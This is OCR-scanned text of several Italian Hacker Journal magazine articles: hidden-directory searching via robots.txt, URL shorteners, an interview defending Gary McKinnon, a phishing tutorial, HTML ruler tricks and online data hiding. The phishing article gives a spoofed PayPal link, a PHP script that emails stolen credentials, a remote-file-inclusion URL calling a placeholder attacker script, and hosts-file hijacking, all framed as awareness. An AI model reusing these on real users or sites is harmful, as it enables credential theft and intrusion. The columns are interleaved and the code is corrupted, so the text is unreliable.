solo perché si arriva alle loro directory 3) ci sia uno schema di controllo de¬ 
nascoste (o meno) semplicemente con gli accessi 
Google. Ecco perché bisogna sapere 




Possiamo farlo con la creazione di un fi¬ 
le robots.txt che contenga l’elenco delle 
directory da non indicizzare. 

La struttura tipica di un file robots.txt è 
la seguente: 


ve, Urano eccetera. 

Si tratta di avere intuito, fortuna e tal¬ 
volta un po' di sana ingegneria socia¬ 
le. Però c'è qualche nome che noi pro¬ 
veremmo in qualunque situazione. Per 
esempio: 


Per raggiungere questi obiettivi bisogna 
studiarsi bene le documentazioni e non 
si può spiegare in quattro righe. Sotto 
allora, e prepariamoci a scoprire altri 
modi in cui possiamo andare a caccia di 
siti-truffa! Anche perché le cose da sa¬ 
pere sono ancora tante. Per esempio, 
quello che abbiamo raccontato funzio¬ 
na bene con i siti statici; ma come fac¬ 
ciamo con i siti dinamici, in cui le pagi¬ 
ne vengono create al volo e non esisto- 
Le directory in cui più probabilmente Questa, tuttavia, è solo una prima li- no come file su un server? 
troveremo script JavaScript. nea di difesa. Proviamo a fare una ri¬ 
cerca di Ci stiamo lavorando. :-) 

log, logs 

inurl:robots.txt filename:txt 

Qui andremmo a cercare i dati registra- 
ti dal sito. 

Posiamo vedere un sacco 

compreso quello 

la Casa Bianca! Niente di male in 
tutto ciò, ma questo è un sistema 

eccetera... per scoprire nomi di director che non < *1 T i~ f I ( 

si vuole vengano mostrate. È lo stesso k ' IJU 

Le estensioni server di FrontPage crea- file a dircelo. Per alcuni siti può essere * 

no tutta una serie di directory con que- una minaccia alla sicurezza. ~ 

sto stile di nomi. . = 4 ’r „ . ' ! . 

La difesa più sicura consiste nel lavora- 


ìmmagmi 


Cartelle che potrebbero contenere le 
immagini usate nelle pagine Web... e 
anche altro. 


L'asterisco spiega a tutti i robot dei mo 
tori di seguire le istruzioni. Queste ulti 
me specificano le directory che non vo 
gliamo vedere indicizzate. 
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pesso le informazioni più pre- 
I ziose sono quelle più nasco- 
j ste e difficili da trovare. Que- 
I. J sto vale anche su Internet e quel 
tutorial preziosissimo o il link per scari¬ 
care la versione vecchia di un program¬ 
ma che ci serve tanto, è una sequen¬ 
za lunghissima di caratteri che punta a 
una pagina annidata in un forum o un 
blog. Indirizzi poco pratici da digitare, 
per esempio su un palmare o cellula¬ 
re. E qualche volta anche se si usa il 
copia e incolla, questi indirizzi lunghi 
possono non funzionare e dare proble¬ 
mi. Magari perché il Client di posta elet¬ 
tronica. il modulo di inserimento di un 
commento o ancora la Chat room non 
riconoscono quelle righe come un uni¬ 
co uri o - peggio ancora - inseriscono 
spazi o a capo. 


E per risolvere questo problema che 
sono apparsi nel corso degli anni dei 
servizi che accorciano gli indirizzi ren¬ 
dendoli più gestibili. Il principio è quel¬ 
lo di un database che salva la nostra 
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sequenza interminabile di caratteri e ci 
fornisce un puntatore che la richiama, 
ma che è di poche parole. Anzi, di po¬ 
chi caratteri. 


:: In pratica 


Facciamo un esempio. Quale prefe^ 
riamo tra questi due indirizzi? 


com). Il servizio è in giro dal 1999 ed è 
tuttora attivo. Tra le funzioni ci sono la 
mascheratura del vero indirizzo, statisti¬ 
che e referrer, indicizzazione su motori 
di ricerca e reindirizzamento a più uri. 
Molte di queste opzioni sono solo a pa¬ 
gamento: nella versione gratuita com¬ 
pare anche una barra inferiore, con cui 
shortenurl si promuove e finanzia. 


http://groups.google.it/group/it.comp.retrocomputing/browse_frm/thread/ 

24d6945c5096456d/391e888c6b56957e#391e888c6b56957e 


http://elfurl.com/ehw2p 


Non c'è dubbio che il secondo sia molto 
più pratico e facile da usare e segnala¬ 
re. E in più funziona in maniera traspa¬ 
rente, redirezionando alla pagina origi¬ 
nale sopra indicata. 


:: Arrivano gli altri 


Uno dei primi a fornire la sintesi degli 
uri è stato shorturl (http://www.shorturl. 


Negli ultimi anni c'è stata una sovra- 
abbondanza di offerte di siti accor- 
cia-url, ma tra quelli più usati e ap¬ 
prezzati sono da segnalare tinyurl 
(http://tinyurl.com/), Make a Shor- 




























▲ Certo accorciano mollo. 

Ma anche nascondono mollo, volendo. 


ter Link (http://www.makeashorterlink. 
com) e Snipurl (http://snipurl.com/). 
Tutti questi offrono la creazione di indi¬ 
rizzi abbreviati non solo dalla loro home 
page, ma anche tramite un bookmark- 
let, i bookmark speciali con dentro co¬ 
dice javascript. Basta trascinarli sulla 
barra dei bookmark del proprio brow- 
ser e con un solo click potremo crea¬ 
re un indirizzo sintetico della pagina 
che stiamo vedendo. A dire il vero Sni¬ 
purl offre anche molto altro agli uten¬ 
ti che si registrano che possono vede¬ 
re, modificare e gestire tutti gli indirizzi 
abbreviati creati, consultare le statisti¬ 
che d'uso e avere abbreviazioni perso¬ 
nalizzate e non casuali scegliendo una 
o più parole. 

Non è finita: altri servizi sono Urlsaw 
(http://www.urlsaw.com/), TightUrl 
(http://tighturl.com/), url(x) (http://urlx. 




'TRAVESTIMENTI 


n 


T ra gli usi dei servizi descritti in que¬ 
ste pagine ce ne sono anche alcuni 
decisamente pericolosi. Un uri abbre¬ 
viato che redireziona automaticamen¬ 
te, può infatti essere usato per fare del 
cloaking. Seguire un indirizzo masche¬ 
rato può contenere sorprese: può essere 
usato per celare un codice di affiliazione, 
poco carino da far vedere, ma anche per 
scaricare o mandare una pagina con del 
codice pericoloso. Prima di dare invio o 
fare click sarebbe bene pensare a chi ci 
sta passando quell’indirizzo. 


org/), Shorl (/www.shorl.com/), SHurl 
(http://shurl.net/) e ElfUrl (http.V/elfurl. 
com). Quasi tutti possono essere usa¬ 
ti per mezzo di bookmarklet (oggettiva¬ 
mente molto comodi) e molti hanno an¬ 
che le statistiche: basta inserire in qual¬ 
siasi momento l'abbreviazione e ci ver¬ 
rà comunicato quante volte è stata usa¬ 
ta. Shorl aggiunge un livello di sicurez¬ 
za in più e permette di vedere le stati¬ 
stiche solo a chi ha creato il link bre¬ 
ve, assegnando una password univo¬ 
ca da usare. 

Alcuni servizi, come Linkachi (http:// 
linkachi.com/) invece hanno l'approccio 
opposto e mostrano una lista in tempo 
reale degli ultimi indirizzi abbreviati o di 
quelli più usati. 



kL'abbreviazione passa diretta mente sul 
nostro sito web. Un servizio in più. 


a Fuori dal coro 

Myllrl (http://www.myurl.in/ 
webtools/toolbar.php) invece di un 
bookmarklet offre addirittura una 
toolbar che si integra con il browser: 
ce ne sono due, per Internet Explo¬ 
rer e Mozilla Firefox. 

Ha una sidebar per Mozilla e il book¬ 
marklet MetaMark (http://metamark. 
net/) ma attenzione! A differenza de¬ 
gli altri non garantisce l’indirizzo corto 
per sempre. Se non viene usato, do¬ 
po 5 anni di inattività i gestori di Me¬ 
taMark lo elimineranno dal database, 
presumibilmente per liberare risorse 
e combinazioni di caratteri. 

Originale e personalizzabile è il tipo di 
indirizzo dell'abbreviatore noto come 
Notlong (http://notlong.com/) che non 
aggiunge caratteri a caso alla fine, ma 
crea domini di secondo livello con pa¬ 
role a piacimento. Si tratta di una solu¬ 
zione testuale interessante. All’uri lungo 
possiamo infatti associare un indirizzo 
http://quellochevogliamo.notlong.com. 


fi 


CORTO 
E MEGLIO 


n 


S toricamente il metodo classico e 
più potente per aggiustare gli uri 
è quella di usare il Rewrite di Apache. 

Il più noto e più usato Webserver ha un 
modulo apposito, mod_rewrite che per¬ 
mette di redirezionare un indirizzo verso 
un altro, trasformando per esempio una 
lunga query in PHP a qualcosa di più bre¬ 
ve, intelligibile e indicizzabile. È una tec¬ 
nica usata da parecchi CMS e blog e per 
chi volesse immergersi nei meccanismi 
ecco qualche coordinata: 

Specifiche ufficiali 

http://httpd.apache.Org/docs/1.3/mod/ 

mod_rewrite.html 

Guida ufficiale 

http://httpd.apache. 0 rg/docs/l. 3 /misc/ 

rewriteguide.html 

Guida passo passo 

http://www.yourhtmlsource.com/ 

sitemanagement/urlrewriting.html 

Guida su aliasing, redirecting e rewri- 

ting in italiano 

http://openskills.info/topic.php?ID=71 


:: Anche a domicilio 


Ancora più utile è Memurl (consulta- 
bile all'indirizzo http://memurl.com/ 
about/yoursite) che oltre che effet¬ 
tuarla sul sito, l’abbreviazione per¬ 
mette di incorporarla anche sul pro¬ 
prio sito web. Basta inserire nell'HTML 
una riga con questa sintassi: 

<a href=”http://memurl.com/makelink/ 
’’>Abbrevia l’indirizzo di questa pagina 
con Memurk/a> 


Per chi infine vuole fare tutto da sé c'è 
Shorty (http://get-shorty.com/): è un 
software che richiede PHP e un data¬ 
base (MySQL dovrebbe andare bene) 
e permette di mettere in piedi un abbre- 
viatore con statistiche sul proprio spa¬ 
zio web da usare come e quando vo¬ 
gliamo: è la ciliegina sulla torta per chi 
vuole il massimo controllo sugli uri. 

Nicola D'Agostino 
www. nicoladagostino. net 
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Hacker Journal: Grazie per aver acconsentito a chiacchiera- 
re con noi. Perché quando vi abbiamo chiesto di cosa avrem¬ 
mo parlato avete indicato Gary McKinnon come tema della 
nostra intervista? 

LOpht: Perché quello che è successo a Gary potrebbe capita¬ 
re a chiunque. Davvero chiunque. E 
non è stata colpa sua. Non del tutto 
almeno e di sicuro viene trattato in- 
giustamente. Vogliamo parlare di lui 
perché abbiamo avuto modo di co¬ 
noscere persone che gli sono state 
vicine e venire a conoscenza della 
_ sua storia, grazie ai molti sistemi di¬ 
sponibili al giorno d’oggi. No... non 
abbiamo parlato di nulla di illegale! Comunque siamo rima¬ 
sti impressionati e spaventati e pensiamo che non ci sia sta¬ 
to sufficiente risalto alle sue vicende. 

HJ.: Cosa è successo a Gary? 

L.: Gary ci ha raccontato che ha sempre sognato di diven¬ 
tare un hacker, da grande. Che questo suo desiderio è na¬ 
to in una sala di cinema nel 1983, assistendo alla proiezione 
del film Wargames. Dopo ventitré anni da quella data, Gary 
è stato estradato dalla Gran Bretagna agli Stati Uniti e ora at¬ 
tende un processo e una sicura condanna per aver condot¬ 


to il più grave cyberattacco militare di tutta la storia. O alme¬ 
no queste sono le accuse. E si tratta di un’assurdità, perché 
quello che ha fatto non è stato nulla di particolarmente grave. 
Ha avuto solo la sfortuna di “divertirsi” all’indomani dell'atten¬ 
tato dell’11 settembre. 

HJ.: Ci risulta che nel 2001, anno dell’attacco alle Torri Ge¬ 
melle e al Pentagono, il Pentagono stesso abbia dichiarato di 
aver subito più di 250.000 “hack”. Si tratta di una cifra impres¬ 
sionante. Perché sono andati a prendere proprio lui? 

L.: Perché avevano bisogno di un capro espiatorio e Gary, 
essendo britannico, era a portata di mano, servito su un piat¬ 
to d’argento dal governo alleato di Tony Blair. 

HJ.: Volete spiegarci cosa ha fatto Gary di tanto grave? 

L.: Partiamo con i fatti. Gary ha penetrato le difese elettro¬ 
niche dei server del Pentagono, entrando così nei database 
dell’intera Difesa degli Stati Uniti. Questo è avvenuto nelle 
notti successive all’11 settembre 2001, in un momento in cui 
la paranoia dilagava in America. La sua azione è stata nota¬ 
ta e lui è stato rintracciato. Gli Stati Uniti hanno deciso di non 
agire unilateralmente in casa di un fido alleato come la Gran 
Bretagna e si sono rivolti alla loro ambasciata. Gli Inglesi so¬ 
no stati più che felici di consegnare Gary agli Americani, seb- 


bbiamo incontrato un guppo di individui che han¬ 
no deciso di comunicare con noi dietro l’iden¬ 
tità collettiva di LOpht (si pronuncia Loft). Stan¬ 
do a quello che ci dicono loro, il LOpht è una struttu¬ 
ra dove i loro talenti vengono impiegati al meglio, quotidia¬ 
namente, in modo libero e costruttivo. La nostra discussio¬ 
ne si è presto spostata sulle vicende di un loro conoscente 
Gary McKinnon. 
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bene dopo qualche trafila. 

HJ.: Tutto qui? Ha solo dato un’occhiata? 

L.: Esatto. Le accuse che gli sono state mosse sono mol¬ 
to gravi. Si va dalla violazione di informazioni protette da se¬ 
greto militare ad azioni di spionaggio. Lo accusano di esser¬ 
si impossessato di informazioni utili a un eventuale nemico, 
di aver messo a rischio la vita di centinaia di migliaia di uo¬ 
mini e donne delle forze armate americane e dei paesi della 
Nato, di aver compromesso la sicurezza del Nord America e 
di aver reso impossibile il compito di difendere la popolazio¬ 
ne dell'area metropolitana di Washington. 

HJ.: Sembra molta roba per un semplice hacker. Gary usava 
il nickname “Solo”... È chiaro che lavorava da solo. 

L.: Il problema è che non lavorava per niente! Nel senso che 
non stava agendo con uno scopo prestabilito. Ha dichiara¬ 
to più volte che la sua scorribanda è stata dettata dalla no- 
tia, dalla voglia di divertirsi e guidata da un paio di spinelli. In- 
somma, non sapeva cosa stava facendo, mentre ci sono sta¬ 
ti casi eccellenti tra cui quello di due programmatori svedesi 
e tre hacker israeliani che hanno condotto un vero e proprio 
attacco e invece non sono stati perseguiti. Gary viene perse¬ 
guitato. Tutto qui. 


A Proprio come nel film Wargames: Gary voleva divertirsi e 
diventare un hacker come quello interpretalo da Matthew Broderick. 
Solo che Broderich è diventato ricco, Gary è stato incarcerato. 

HJ.: Ma come è possibile che un ragazzo privo dell’intenzio¬ 
ne di ledere riesca a mettere in crisi il Pentagono? 

L.: È possibile perché il sistema di difesa telematico ha dei 
problemi e dei buchi enormi. Lo dimostra il fatto che nel 2001 
ci sono stati costì tanti attacchi. Anni fa noi stessi avevamo 
segnalato questi problemi di sicurezza, senza che però qual¬ 
cuno si occupasse di mettere una pezza. Risultato? Il Penta¬ 
gono è ancora attaccabile. 

HJ.: Abbiamo letto che il comportamento di Solo è stato spes¬ 
so autodistruttivo in quel periodo e che qualcosa di criminale 
l’ha effettivamente commesso. 

L.: Gary cercava abitualmente conferme e prove di cospira¬ 
zioni operate dal governo degli Stati Uniti. Sostiene di aver 
scoperto l'esistenza di un traffico di ufficiali che vengono spo¬ 
stati e trasferiti dai loro comandi verso non identificate desti¬ 
nazioni, navi o vascelli non necessariamente in navigazione 
sui mari terrestri. Sostiene che gli USA sono effettivametne in 
contatto con delle potenze “aliene", ma dice anche che in quel 
periodo consumava molti stupefacenti e spesso non era re¬ 
sponsabile delle proprie azioni. Ha ammesso di aver cancella¬ 
to dei dati dopo essere entrato in un server governativo ma... 
insomma, c’è gente che ha commesso azioni ben peggiori! 

HJ.: Sarebbe possibile ora ripetere le azioni di Solo? 

L.: Da quello che sappiamo noi qualunque entità è attaccabi¬ 
le. Date le risorse sufficienti e le motivazioni e la determina¬ 
zione necessaria potrebbe essere possibile penetrare anco¬ 
ra il Pentagono o altre realtà della Difesa USA: non solo, ri¬ 
teniamo addirittura che queste falle di sicurezza siano volon¬ 
tarie. Ossia, tengono la guardia abbassata per poter rintrac¬ 
ciare aggressori, catturarli e interrogarli. Vengono costante- 
mente aggrediti, soprattutto da hacker della Repubblica Po¬ 
polare Cinese. Ma sono diventati davvero bravi, adesso. I si¬ 
stemi cambiano e sono sempre pronti a rintracciarti. Quindi 
questa non è il tipo di battaglia che un vero hacker deve com¬ 
battere. Se si vuole cambiare il mondo lo si deve fare senza 
infrangerne le regole. 

HJ.: Sottoscriviamo in pieno. Grazie mille! 
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Pagine con l’inganno, e mail che truffano ; 
telefonate che menno a estorcer e i nostri àati 
personali. lutto guello elle bisogna sapere sul pbisbing 


ikipedia.it dice così: “In am- 
|T I I bito informatico il phishing 
I i I è una tecnica di ingegneria 
ili sociale utilizzata per otte¬ 
nere l’accesso a informazioni perso¬ 
nali o riservate con la finalità del furto 
di identitàf...]” 

È una tecnica che conosciamo bene e 
continua tutt’ora a mietere vittime. Si basa 
molto sull'ingenuità dell'utente e sulla ca¬ 
pacità dell'attaccante di creare il più pos¬ 
sibile uno scenario fedele a quello del si¬ 
stema ufficiale. 

L'attaccante può usare numerosi metodi 
per portare a termine l’impresa: 

- l’invio di email contraffatte: 

- l’utilizzo di “inclusion vulnerability bug"; 

- la modifica della tabella degli host di si¬ 
stema. 


:: L'invio di email 
contraffatte 

% 

E la piùcomune, semplice e subdola 


forma di phishing. Non servono infatti 
particolari capacità tecniche per porta¬ 
re a termine questo genere di attacco. 
Si basa tutto sull’invio di migliaia di e- 
mail contraffatte che sembrano proveni¬ 
re da siti web noti o fidati e che, diretta- 
mente o indirettamente, invitano a utiliz¬ 
zare le nostre credenziali di accesso. 
Ecco qui alcuni semplici esempi di ri¬ 
chiesta: 

«Gentile Cliente di Poste.it 
a causa di un guasto tecnico del no¬ 
stro database di riferimento degli ac- 
count avvenuto in data xx.xx.xx la invi¬ 
tiamo a effettuare nuovamente il login 
seguendo il link sottostante in modo da 
riconfigurare a dovere i record del da¬ 
tabase...» 

«Gentile Utente eBay, durante i regola¬ 
ri controlli sugli account non siamo sta¬ 
ti in grado di verificare le sue informa¬ 
zioni. [...] E' sufficiente che lei esegua 
il login e completi il modulo che le for¬ 
niremo. [...].» 

«Egregi clienti della banca internet 
XYZ. Vi informiamo su ultime novità del 


sistema di sicurezza della nostra ban¬ 
ca. [...] Per far funzionare il Vostro con¬ 
to corrente in modo regolare è neces¬ 
sario entrare nel Vostro conto dal nuo¬ 
vo indirizzo (http://www.XVZ.net), uti¬ 
lizzando la combinazione Codice Uten¬ 
te, Password e PIN assegnatavi in pre¬ 
cedenza». 

Ovviamente questo genere di mes¬ 
saggi viene ben impaginato utilizzan¬ 
do la grafica comunemente usata nel 
sito internet originale cosa che trae in 
inganno il novanta percento degli in¬ 
ternauti. 

Il codice di una phishing-mail è l’usua¬ 
le codice html adatto allo scopo, ma 
possiamo notare come aM’interno del 
codice dell’email si nasconda in realtà 
una trappola. Nel tag del collegamen¬ 
to alla pagina di login si nota che, cuc¬ 
cando sul link proposto, la connessio¬ 
ne sarà indirizzata verso http://nostro- 
server/login.html che non è una pagina 
appartenente alla società che credia¬ 
mo. Ovviamente, per non destare so¬ 
spetto, un attacker utilizzerà un uri ap- 

















positamente camuffato evitando di mo¬ 
strare il link in chiaro nella barra degli 
indirizzi del broswer. Ecco un pezzo di 
codice incriminato: 


le una “complicità” del codice usato nel 
sito, e, utilizzare un bug aH'interno del 
codice php. Una inclusion vulnerabili- 
ty è infatti un tipo di bug che può far in- 


Per ripristinare correttamente le sue credenziali di accesso a PayPal effettui il 
login seguendo l'indirizzo sottostante: 

<a href="http://nostroserver/login.html" 

onMouseOver="a('https ://www.paypal.com/cgibin/webscr?cmd= _ loginrun' ) ; return 
true" 

onMouseOut = "b()">https://www.paypal.com/cgibin/webscr?cmd= _ login 
run</axbrxbr> 

<br>La ringraziamo per la sua cortese collaborazione<br>^_ _ 
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http://www.paypal.com/scriptmalco- 

dato.php?page=Http://myserver/login. 

php 

che è generalmente molto credibile (chi 

di noi 
control- 

r 

la esatta¬ 
mente tutti 
i link lunghi 
e noiosi?). 


Il vero “cuore” di tutto 
l’attacco 


<?php 



include ($ _ GET ['pagina']) ; 




eludere all’interno del sito un qualsiasi 
file o directory si voglia. Un bug di que¬ 
sto genere si può verificare quando è 
presente un codice di questo tipo che 
non viene poi controllato dai filtri dello 
È il form che sarà compilato dall’ignaro script php: 
utente con i suoi dati. La pagina, gra¬ 
ficamente molto simile a quella prece¬ 
dente, presenta una serie di campi che 
dovranno cercare di intrappolare i dati 
sensibili. Lo script di login è legato a un 
file .php per memorizzare le credenzia¬ 
li di account degli utenti. 

Prelevati i dati, sono inviati tramite mail 
all’indirizzo appositamente indicato nel¬ 
la variabile “Ssendto” dello script. Suc¬ 
cessivamente il codice segnala all’igna¬ 
ro utente dell’avvenuta riattivazione e In questo caso infatti richiamando dal 
dopo tre secondi ricarica la pagina ver- broswer un uri di questo tipo: 
so il vero sito di PayPal. Sistema di una 
semplicità incredibile, ma più usato più 
di frequente di quello che si pensi. 

Ecco come spesso si presentano le pri¬ 
me righe di codice di una pagina come 

quella appena detta: possiamo includere all’interno della pa¬ 

gina qualunque codice o file. Un at- 
tacker accorto camuffa la par¬ 
te di uri (in questo caso “ht- 
p://altrositochevoglia- 
mo/devil- 


paypal.php: 


$user = $_ POST ['user'] ; 

$passw = $ _ POST['passw'] ; 

$ sendto = "lamer@whitehouse .gov" ; 


$subject = "Info account"; 

$message = " Username: $user \r\n Password: 
mail($sendto, $subject, $message); 
echo ' 


:: L’utilizzo di “file inclusion 
vulnerability” 


Un’altra tecnica più sofisticata, ma an¬ 
che piùdifficile da attuare perché ci vuo- 


tabella 
degli host di sistema 

Questo sistema è il più efficace, ma 
anche il più difficile da attuare. È ne¬ 
cessario infatti avere accesso (fisico o 
remoto) al computer al quale si voglio¬ 
no rubare le credenziali di accesso de¬ 
gli account. È un sistema che è infatti 
completamente trasparente e un utente 
non noterebbe alcuna traccia del dirot¬ 
tamento della propria connessione ver¬ 
so un sito “poco affidabile”. Questo at¬ 
tacco viene portato a termine grazie al¬ 
la modifica della tabella degli host di si¬ 
stema. In WindowsXP la troviamo nella 
directory C:/windows/system32/drivers/ 
etc/ dove sono depositate tutte le asso¬ 
ciazioni ip -> hostname (per esempio 
127.0.0.1 -> localhost). Ma che succe¬ 
de se aggiungiamo la riga 


http : //nomeserver/script .php?pagina=http : //altrositochevogliamo/ 
devilscript .php & (a capo solo per motivi di spazio) 


209.85.129.147 www.ebay.it sotto 
quella “127.0.0.1 localhost”? Proviamo 
e salviamo. Poi avviamo il nostro bro¬ 
swer preferito e connettiamoci a www. 
ebay.it. Con stupore ci troveremo su 
Google. Modificando questa tabella le 
connessioni sono quindi dirottate ver¬ 
so server con una copia del sito che vo¬ 
gliono attaccare. 

Non vogliamo certo incentivare attac¬ 
chi di questo tipo ma, anzi, ora sap¬ 
piamo bene come non cadere in que¬ 
sto genere di frodi. Un ringraziamen¬ 
to particolare ad Anna, Roberto, The- 
DarkCIown, BlacklceX, TormenT e Pon- 
go91 per avermi supportato nella stesu¬ 
ra di questo articolo. 


$passw 


script.php”) con un uri cifrato in mo¬ 
do che non rimanga completamente 
in chiaro. 

Con questo tipo di attacco “combina¬ 
to” è molto più facile che persone igna¬ 
re cadano nella truffa. Nella barra degli 
indirizzi infatti si potrebbe avere un uri 
di questo genere: 


IlMerovingio 
[www.wow.netsons.org / 
www. thewarcraftzone. tk] 
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si dilettano a serivere codice per le pagine Ptml 


i sono situazioni in cui ottene¬ 
re risultati normalmente sem¬ 
plici comporta sforzi consi¬ 
derevoli, come per esempio 
la ripartizione degli spazi in ambito 
htmi: se non conosciamo la tecnica 
giusta non è certo semplice. 


Tirare 

delle righe orizzontali è spesso impor¬ 
tante. O perlomeno simularle opportu¬ 
namente. Supponiamo di voler dividere 
degli spazi sulla nostra pagina web. La 
normale notazione per tirare una riga (il 
tag<hr>) la riteniamo scontata e noio¬ 
sa e vogliamo invece adottare un’im¬ 
magine. Si può fare, a maggior ragione 
se useremo bene anche l'attributo alt 
con il testo opportuno. 

Ovviamente si potrebbe anche usare 
tranquillamente una bella riga orizzon¬ 
tale e poi adottare un piccolo trucco dei 
fogli di stile CSS per visualizzare l'im¬ 
magine in tutti i browser più recenti. 
Teniamo però presente che i vecchi 
browser e i browser di solo testo igno¬ 
reranno i CSS e semplicemente ci fa¬ 
ranno vedere le righe orizzontali nel lo¬ 
ro stile originario. 

Alcuni browser di solo tendono a uti¬ 
lizzare addirittura solo il normale trat¬ 
tino di separazione o la sottolineatura, 
espandendola pieno video. 

Operare in questo modo consente di 
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x. sempre più 
ga da termini 
. per esempio). 


dare dei vantaggi anche a chi usa dei 
browser particolari. Per esempio, un 
lettore di schermate come jaws (ht- 
tp://www.freedomscientific.com/fs_pro- 
ducts/software_jaws.asp), capace di 
tradurre in parole quello che c’è scrit¬ 
to su un video, legge il nome del file di 
qualunque immagine presente che non 
abbia un attributo alt associato. 

Un browser di testo come Lynx visua¬ 
lizza il nome di ciascuna immagine che 
non abbia un attributo alt. Le linee 
orizzontali le rappresenta come una se¬ 
rie di caratteri “underscore” sufficienti a 
riempire l'ampiezza della pagina. 

Links, un altro browser di testo, non vi¬ 


sualizza nulla delle immagini che non 
hanno un attributo alt valido. 

In tal caso o inseriamo anche l’attribu¬ 
to alt, oppure dobbiamo usare neces¬ 
sariamente il tag <hr> , che comunque 
sarà interpretato da Links come una se¬ 
rie di trattini ampi quanto lo schermo. 




per creare 
una riga orizzontale, il sistema più 


-I coSa SonoI 
/GU ELEMENTI ?\ 

A bbiamo parlato di elementi di bloc¬ 
co e di elementi di linea. Per ca¬ 
pirci: 

gli elementi di blocco sono quelli che 
creano un blocco attorno a sé, e che di 
conseguenza vanno a capo, come i pa¬ 
ragrafi, le tabelle, le form. Quelli di linea 
sono invece quelli 

di elementi che - non andando a capo - 
possono essere integrati nel testo, come 
i collegamenti o le immagini. 
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pido tag <div>. mente da una serie di trattini ripetuti. 

Mettiamo innanzitutto questo CSS nella Si tratta di un metodo abbastanza sem- 
sezione < style > in cima a tutto. plice per gestire in modo rapido ed effi- 

Se usiamo un CSS esterno tipo ciente lo spazio, una soluzione che me- 

style-sites .css mettiamoci quello. rita di essere presa in considerazione. 



semplice per rendi 
nost ra pa gina è ag 
butofTQial tag 


A aen. non è 
esattamente il 
righello che 
intendiamo, però 
serve anche lui a 
regolamentare lo 
spazio 


Welcome to GW Micro 


◄ Window-Eyesè 
un lettore di 
pagine web. 

Tirare delle 
righe ben costruite 
evita di fargli 
pronunciare 
dettagli inutili. 


Sire* 1990. GW itero he » tmttM ptor**r r< the ttaptivc tecrmotogv irOuttry, and 
rontiri.es to leed wltn innovativa, aiatomer driver eoiuUons. 


Quindi eccolo 


decisamente meglio rispetto ad alterna 
tive complicate e laboriose. 

none} 

/*/*/&{} .r- ■;» 

display: block; 
height: 25px; 

background-image: uri (/images/righellofigo.gif ) ; 
background-repeat: no-repeat; 
background-position: center center; 
margin: lem 0 lem 0; 


Ovviamente sostituendo a height e 
i dati di altezza e l’indirizzo della nostra 
immagine. 


Dopodiché, nella nostra pagina, quan 
do vorremo usare il nostro super righel 
lo ci basterà scrivere: 


Dovremmo anche aggiungere, meglio, 
un attributo <title> per sistemare le 
cose anche per browser normali, che le 
immagini le mostrano veramente. Que¬ 
sto significa che, guardando le due ri¬ 
ghe di codice proposte di seguito, pos¬ 
siamo prendere la prima e trsformarla 
nella seconda: 


Così facendo tutti browser più moderni 
ci faranno vedere l'immagine come ri¬ 
ghello orizzontale. Netscape 4 visualiz¬ 
zerà un righello normale e i browser di 
solo testo, ignorando i CSS, ci faranno 
vedere anche loro un semplice righel¬ 
lo, probabilmente composto esclusiva- 


/images/righellofigo .g±f" width="442" height="25"> 

title="" src="/images/righellofigo.gif" width="442" height="25 


Ovviamente non stiamo a impazzire 
con cose tipo riempimenti dell'attribu¬ 
to alt con ottanta trattini... ne basta¬ 
no due o tre. 


<hr>. Per fare funzio 
nare la cosa su tutti i browser, però, in 
vece di usarlo direttamente, per visua 
lizzare le immagini adottiamo il più stu 
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L o ha scritto Edgar Allan Poe nel 
XIX secolo, nel suo racconto 
La lettera rubata (consultabile 
su http://snipurl.com/10g5v): il 
modo migliore per nascondere qual¬ 
cosa è metterlo in vista davanti a tut¬ 
ti. Su questo principio si basano molti 
dei sistemi utilizzati dalle moderne tec¬ 
niche per occultare informazioni sensi¬ 
bili. Per nascondere i dati che tutti cer¬ 
cherebbero dentro il nostro computer, 
basta tenerli fuori dal computer! 

Anche solo un paio di anni fa sarebbe 
stato molto più difficile di adesso. Og¬ 
gi è una sciocchezza e sta diventando 
sempre più facile ed efficace. Provia¬ 
mo a vedere che possibilità abbiamo a 
disposizione. Sono puri esempi, ovvia¬ 
mente; di possibilità nuova ne nasce 
letteralmente una al giorno. 


Archivio file 


Il disco rigido online è ancora una 
realtà piuttosto lontana, ma per di¬ 
mensioni non esagerate iniziano a 


nascere varie alternative efficaci. 

In questo senso la preistoria è, per dire, 
la Valigetta di Yahoo! (http://briefcase. 
yahoo.com), con i suoi 30 mega. Prei¬ 
storia non tanto nelle dimensioni (se so¬ 
no dati veramente confidenziali, pesano 
poco) quanto nella tecnologia: pratica- 
mente un FTP con sopra un'interfaccia 
da niente. Ma la vera rivoluzione sono 
i dischi virtuali, che stanno su Internet 
ma si montano sulle nostre scrivanie 
come se fossero fisici, grazie a un pro¬ 
tocollo che si chiama WebDAV. 


A Visto come è facile scrivere un articolo 
in Google Docs? 


WebDAV è un po’ più lento di un FTP 
perché dialoga più strettamente con il 
sistema operativo. Ma con il cresce¬ 
re della banda e computer sempre più 
veloci finiranno per divenire veri e prò- 


TRUCCO DEI 
XIX SECOLO 


P iù riflettevo sull’ingegnosità di 
D***, così audace, brillante e fuo¬ 
ri dal comune, più riflettevo sul fat¬ 
to che doveva tenere la lettera a por¬ 
tata di mano, se voleva servirsene al 
momento opportuno, più riflettevo sul 
fatto (ormai appurato dal prefetto) che 
il documento non si trovava nel raggio 
di una normale perquisizione di poli¬ 
zia, più mi convincevo che, per nascon¬ 
dere la lettera, il ministro si era ser¬ 
vito dell'espediente più ovvio e astu¬ 
to. Vale a dire, non aveva affatto ten¬ 
tato di nasconderla.(da La lettera ru¬ 
bata, di Edgar Allan Poe, http;//snipurl. 
com/1 Óg5v) 
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» GEME 



I l nostro Barg thè Gnoll ha messo su 
Google Notebook un piccolo messag¬ 
gio per i lettori di Hacker Journal. Chi 

riesce a leggerlo? Tutti gli indizi utili so¬ 
no disseminati in questo articolo... 


pri dischi virtuali. WebDAV si usa sen¬ 
za problemi su Windows, Linux e Mac 
OS X. Se saliamo di dimensioni, i di¬ 
schi virtuali WebDAV si pagano cari 
(per esempio 49 dollari l’anno per 25 
giga su http://www.bingodisk.com), ma 
in questi casi il prezzo è garanzia ulte¬ 
riore di sicurezza. Nel dubbio, ricordia¬ 
moci sempre dei programmi per usa¬ 
re Gmail come disco rigido, GMail Dri¬ 
ve (http://www.viksoe.dk/code/gmail. 
htm) per Windows, gDisk per Mac (ht- 
tp://gdisk. sourceforge.net) e, per Li¬ 
nux, Gmail Filesystem di Richard Jo¬ 
nes (http://snipurl.com/8q38). 



A Altro esempio stupido di loglio di calcolo: 
log di partite di calcetto. Google Docs ha a 
disposizione formule più che a sufficienza 
per ogni esigenza plausibile di calcolo. 


:: Posta elettronica 

